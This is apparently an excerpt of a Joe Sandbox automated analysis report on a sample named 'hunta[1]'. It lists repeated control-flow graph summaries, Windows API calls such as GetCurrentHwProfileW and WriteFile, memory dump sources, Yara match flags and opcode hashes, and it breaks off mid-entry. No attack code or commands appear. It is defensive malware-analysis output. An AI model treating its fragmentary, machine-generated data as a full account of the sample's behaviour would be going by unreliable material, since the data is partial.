                                    • Opcode Fuzzy Hash: 702301de202712047281c3325d116e65ed26ee6a69703b0082e8a58e5fd1968f
                                    • Instruction Fuzzy Hash: 65619EEB14D110BDB202C5826FACAFBA76FE6D67307308C6AF407D6502E3D44B895536

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 425 59b05b3-59b07d3 452 59b07de-59b0800 GetCurrentHwProfileW 425->452 454 59b080a-59b08c0 452->454 460 59b08c2-59b0902 call 59b0907 454->460 466 59b0904-59b0a9b call 59b0aa2 460->466 488 59b0acd-59b0b79 466->488 489 59b0a9d 466->489
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: fa2e049ff72a08ad5acaffcbc704db0ba3bdc9e6f364c864638d9bddc46573bf
                                    • Instruction ID: 274899f6c633c4ac30ce37484c6221837d86e55a2094ac68c9bfd32fd3ee21aa
                                    • Opcode Fuzzy Hash: fa2e049ff72a08ad5acaffcbc704db0ba3bdc9e6f364c864638d9bddc46573bf
                                    • Instruction Fuzzy Hash: B361AEEB14C111BDB102C5866FACAFBA76FE6D67307308D66F40BD6502E3D84B891536

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 498 59b0679-59b067e 500 59b063e-59b0674 498->500 501 59b0680-59b0682 498->501 503 59b0685-59b07d3 500->503 501->503 521 59b07de-59b0800 GetCurrentHwProfileW 503->521 523 59b080a-59b08c0 521->523 529 59b08c2-59b0902 call 59b0907 523->529 535 59b0904-59b0a9b call 59b0aa2 529->535 557 59b0acd-59b0b79 535->557 558 59b0a9d 535->558
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: efd5b34b65a14609660ba6e995bee83e878dca7231dab19cc1fd56a7a055f7db
                                    • Instruction ID: 5c9656e488ee60ffe11688e3ca30be3df7079fa24e044ea5e33bf826ac2a2b75
                                    • Opcode Fuzzy Hash: efd5b34b65a14609660ba6e995bee83e878dca7231dab19cc1fd56a7a055f7db
                                    • Instruction Fuzzy Hash: 8B51D0EB64D110BDB202C5926F9CAFB6B2FE6D27307308C66F407D6506E3D84E8A5172

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 567 59b05a9-59b07d3 591 59b07de-59b0800 GetCurrentHwProfileW 567->591 593 59b080a-59b08c0 591->593 599 59b08c2-59b0902 call 59b0907 593->599 605 59b0904-59b0a9b call 59b0aa2 599->605 627 59b0acd-59b0b79 605->627 628 59b0a9d 605->628
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 461140f42775da96b9179f03cfbd4914c6eb935a892f88e13880b4e021cde9a2
                                    • Instruction ID: 1a76fdf2ad46bdda2b5d16a1b02d82d4d65b7ea4445b488bb92a8a4a4d918f48
                                    • Opcode Fuzzy Hash: 461140f42775da96b9179f03cfbd4914c6eb935a892f88e13880b4e021cde9a2
                                    • Instruction Fuzzy Hash: A7519FEB14D110BDB202C5926BACAFBA76FE6D67307308C67F407D6506E3D84B891176

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 637 59b05fd-59b07d3 660 59b07de-59b0800 GetCurrentHwProfileW 637->660 662 59b080a-59b08c0 660->662 668 59b08c2-59b0902 call 59b0907 662->668 674 59b0904-59b0a9b call 59b0aa2 668->674 696 59b0acd-59b0b79 674->696 697 59b0a9d 674->697
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c683d1a51dc16a09b6b5a8211e7430a681930f84fba5d05d34ecb5838d2b49a4
                                    • Instruction ID: 8383667d60e2bf82ae57bc5e024624ca7d638eb28cc8cdee1551d7f7c3872084
                                    • Opcode Fuzzy Hash: c683d1a51dc16a09b6b5a8211e7430a681930f84fba5d05d34ecb5838d2b49a4
                                    • Instruction Fuzzy Hash: 1B51BFEB54C110BDB102C5826FACAFBA76FE6C67307308C66F407D6506E3D84B891536

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 706 59b0615-59b07d3 729 59b07de-59b0800 GetCurrentHwProfileW 706->729 731 59b080a-59b08c0 729->731 737 59b08c2-59b0902 call 59b0907 731->737 743 59b0904-59b0a9b call 59b0aa2 737->743 765 59b0acd-59b0b79 743->765 766 59b0a9d 743->766
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 43939f311c3fa0581916075cfb2dfa986c8d885c3f987a44214c3ac82fb43323
                                    • Instruction ID: fc33240381ccd4ccb42603ca6a325bf3ac930ca1769ae4f56c59c0e2e899ae5a
                                    • Opcode Fuzzy Hash: 43939f311c3fa0581916075cfb2dfa986c8d885c3f987a44214c3ac82fb43323
                                    • Instruction Fuzzy Hash: D9519EEB64C110BDB102C1826FACAFB976FE6D67707308D66F407D6506E3D84B8A1532

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 775 59b063e-59b07d3 795 59b07de-59b0800 GetCurrentHwProfileW 775->795 797 59b080a-59b08c0 795->797 803 59b08c2-59b0902 call 59b0907 797->803 809 59b0904-59b0a9b call 59b0aa2 803->809 831 59b0acd-59b0b79 809->831 832 59b0a9d 809->832
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 454ef1efd1570499a4deaf6d614ceb722cfdcbb2a8ab9d5c4a5848969fa519e4
                                    • Instruction ID: c7cb6a25556d0dd342aa1b913083a3b449bf102610b8710fcfc50d12c79da5bc
                                    • Opcode Fuzzy Hash: 454ef1efd1570499a4deaf6d614ceb722cfdcbb2a8ab9d5c4a5848969fa519e4
                                    • Instruction Fuzzy Hash: 59519CEB64D110BDB102C1926FACAFB9B2FE6C67707308C66F407D6506E3D84B8A1572

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 841 59b0626-59b07d3 862 59b07de-59b0800 GetCurrentHwProfileW 841->862 864 59b080a-59b08c0 862->864 870 59b08c2-59b0902 call 59b0907 864->870 876 59b0904-59b0a9b call 59b0aa2 870->876 898 59b0acd-59b0b79 876->898 899 59b0a9d 876->899
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 67595672bf9ca37645f4eada93ffe3d3ab50716105cf389d343695712b7b48a0
                                    • Instruction ID: 389bbdf649023177c8cfcc4cf381691fb9696f93a9391f7407e4a7841b4fc0a2
                                    • Opcode Fuzzy Hash: 67595672bf9ca37645f4eada93ffe3d3ab50716105cf389d343695712b7b48a0
                                    • Instruction Fuzzy Hash: AB51ACEB54D110BDB202C1926F9CAFBAB6FE6C67307308C66F407D6502E3D84B8A1572

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 908 59b066a-59b07d3 927 59b07de-59b0800 GetCurrentHwProfileW 908->927 929 59b080a-59b08c0 927->929 935 59b08c2-59b0902 call 59b0907 929->935 941 59b0904-59b0a9b call 59b0aa2 935->941 963 59b0acd-59b0b79 941->963 964 59b0a9d 941->964
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f28a34c495eb518d1082d28f1f80fdd441693f0681e619fec1bd07dd8e6be69c
                                    • Instruction ID: a8511625435a803b3944b11ab4fa1b2d38f6fd11a7158ca63423eedef2635af1
                                    • Opcode Fuzzy Hash: f28a34c495eb518d1082d28f1f80fdd441693f0681e619fec1bd07dd8e6be69c
                                    • Instruction Fuzzy Hash: C151ADEB64C110BCB102C5926FACAFB976FE6D67707308C26F407D5906E3D84B8A1532
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 6177fbaf9f7e62cd1c9769952d3c20ba14279b66371e3ea16250b7d253fd4cbc
                                    • Instruction ID: 55b9f0bad268d6fbce1d4d5ee4b5d7aaf38fc5e9a76bc4c0df9e9333cd896d11
                                    • Opcode Fuzzy Hash: 6177fbaf9f7e62cd1c9769952d3c20ba14279b66371e3ea16250b7d253fd4cbc
                                    • Instruction Fuzzy Hash: 65519EEB64C111BDB212C1912F9CAFBA76FE6C67707308836F407D6506E3D84B8A1571
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 2826e90f785c6a72fe536453682b421c291fe8496fefeaed15b7f2f4b7e95f9b
                                    • Instruction ID: afe69c6af9dc0eb90a22ee78d45f51c0d236d01e9d974d7cf0b9c5d5a72b6cbf
                                    • Opcode Fuzzy Hash: 2826e90f785c6a72fe536453682b421c291fe8496fefeaed15b7f2f4b7e95f9b
                                    • Instruction Fuzzy Hash: 01516BEB64D111BCB112C1912BACAFB976FE6C67707308C76F407D5906E3D84B8A1571
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 4857ae60c07d5099e549ce7bf3ed479cdf5f8b46acbb0f700b9578c5da1cd735
                                    • Instruction ID: d7b3221821fa7fd6884dac3b9cbb0feafaa6f064c9cc34a4587430a52d585196
                                    • Opcode Fuzzy Hash: 4857ae60c07d5099e549ce7bf3ed479cdf5f8b46acbb0f700b9578c5da1cd735
                                    • Instruction Fuzzy Hash: BB516AEB64D111BCB102C1912FACAFB976FE6C67707308866F40BD6906E3D84B8A1572
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: e9c181b267d03a5d493cab5a637cf9249d3255c66198e7d63b0187e25b0e670f
                                    • Instruction ID: 9c1346a81354f219658ffcf071e16a7f38f25bfe2fda312e7f385dde35497720
                                    • Opcode Fuzzy Hash: e9c181b267d03a5d493cab5a637cf9249d3255c66198e7d63b0187e25b0e670f
                                    • Instruction Fuzzy Hash: 75518BEB54D111BCB102C1922FACAFB9B6FE6C67307308C26F407D6506E3D84B8A6472
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 0ea5228a8472770be39bbcd87442c12b4e80335f0dfcd92c9be74d2eb944fbcb
                                    • Instruction ID: ed0df1ddd8fe53998ea337b0ef28c9b989226e60075a6ec1878e4fc26eb0164b
                                    • Opcode Fuzzy Hash: 0ea5228a8472770be39bbcd87442c12b4e80335f0dfcd92c9be74d2eb944fbcb
                                    • Instruction Fuzzy Hash: B3517CEB64D111BCB102C1912FACAFB9B6FE6C67307308836F407D5906E3D84B8A6571
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 706c06ee60d502c263ed91f420422842e92a89b1facc2f4994d7dee589265ede
                                    • Instruction ID: bf870632cb09e7b0ac235a01b6aee2f0113a6ddde772b35d61da8b5f5e800dfc
                                    • Opcode Fuzzy Hash: 706c06ee60d502c263ed91f420422842e92a89b1facc2f4994d7dee589265ede
                                    • Instruction Fuzzy Hash: B0516AEB64D111BCB102C1812FACAFB976FE6C67307308866F407D6906E3D84F8A2571
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: c468fda6c11036c9e728f0bf62ca85ab917a7ad142ec1689fe76102fc1f3e98f
                                    • Instruction ID: 8189873c61e0c92d4c54d39605d65e41651642c2aaef465846db2ee7c8316d3f
                                    • Opcode Fuzzy Hash: c468fda6c11036c9e728f0bf62ca85ab917a7ad142ec1689fe76102fc1f3e98f
                                    • Instruction Fuzzy Hash: 4F517BEB64D125BCB102D5812FACAFB976FE6C67307308836F407D5906E3D84B8A5171
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: d4c99a85598d8d0b3cef971f1f6799c445b8a86350e7aa20ad9e885b4c6a5606
                                    • Instruction ID: fe6d517b77163a7f41ed0c6c2f206456bcd86c3b2a705baeeee8a35962780b55
                                    • Opcode Fuzzy Hash: d4c99a85598d8d0b3cef971f1f6799c445b8a86350e7aa20ad9e885b4c6a5606
                                    • Instruction Fuzzy Hash: 83516BEB64C121BCB112C5912BACAFB976FE6C67303308876F407D6506E3D84F8A1471
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 6e3c55c5b36c27a7ca14da5ed018a37a66179a340e782d9a6f606e2ece807533
                                    • Instruction ID: 72e6147c6930457d46e0a988015c901c077f3fda4dd4a15ef0649766e13e1234
                                    • Opcode Fuzzy Hash: 6e3c55c5b36c27a7ca14da5ed018a37a66179a340e782d9a6f606e2ece807533
                                    • Instruction Fuzzy Hash: F5414AEB64D121BCB112C1912F6CAFB9B6FE6C67307308866F407D5906E3D94F8A2172
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 53756676d75eadc59a15d1b0818da8948e2959d2b8e84153fcdb22a0ee4180e9
                                    • Instruction ID: f0c1d0696e58b24ee95d92f9cfe138d16c7c3649818f28fb2b4b2f5136b6e19c
                                    • Opcode Fuzzy Hash: 53756676d75eadc59a15d1b0818da8948e2959d2b8e84153fcdb22a0ee4180e9
                                    • Instruction Fuzzy Hash: 26414AEB64D121BCB512C5912B6CAFB976FE6C67307308876F407D5906E3D84F8A2171
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,00F66747,?,00000000,00000000,00000000,?,00000000,?,00F5BC71,00F66747,00000000,00F5BC71,?,?), ref: 00F72CE1
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: f496c688e027a4984a2dc3fa509217ff829ba4e14fc32113970571f89883861d
                                    • Instruction ID: 7fc1ea7240ab69b3bb1d1339d1c01d41f5ce7cd4f1044ac763dce4ba3538cb50
                                    • Opcode Fuzzy Hash: f496c688e027a4984a2dc3fa509217ff829ba4e14fc32113970571f89883861d
                                    • Instruction Fuzzy Hash: F061C672D00119AFDF52CFA8CC84EEE7BB9BF59314F148146E808A7216D775D901EBA2
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00EEB801
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction ID: ec6b7c9382df2989adabf22140993b3c2888fb2ed7d9d347a16e649a417a7e61
                                    • Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction Fuzzy Hash: 1A4114729001599BCB15DF69DC806AF77A5EF84351F1402AAFD09EB301D730EE1197D1
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00F720B9,00000000,CF830579,00FB1090,0000000C,00F72175,00F6627D,?), ref: 00F72228
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: f7ad4fb95e49a0511f9b968fd955666959d8d460768f6215cd99ab25d61405dd
                                    • Instruction ID: d15c4f6e7aacb2759338d8afaae880060d29d9e9b997e65540583d386f8f9cf1
                                    • Opcode Fuzzy Hash: f7ad4fb95e49a0511f9b968fd955666959d8d460768f6215cd99ab25d61405dd
                                    • Instruction Fuzzy Hash: FB112533E1831416E66132746C45B7E77899F86734F35821BE91C9B0D3DAA9CC41B593
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00FB0D48,00F5BC71,00000002,00F5BC71,00000000,?,?,?,00F6B826,00000000,?,00F5BC71,00000002,00FB0D48), ref: 00F6B758
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                    • Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: 9b66cb97aace613b7b16aaaee8f9425dd7f36c1790a2a32a9497005413590343
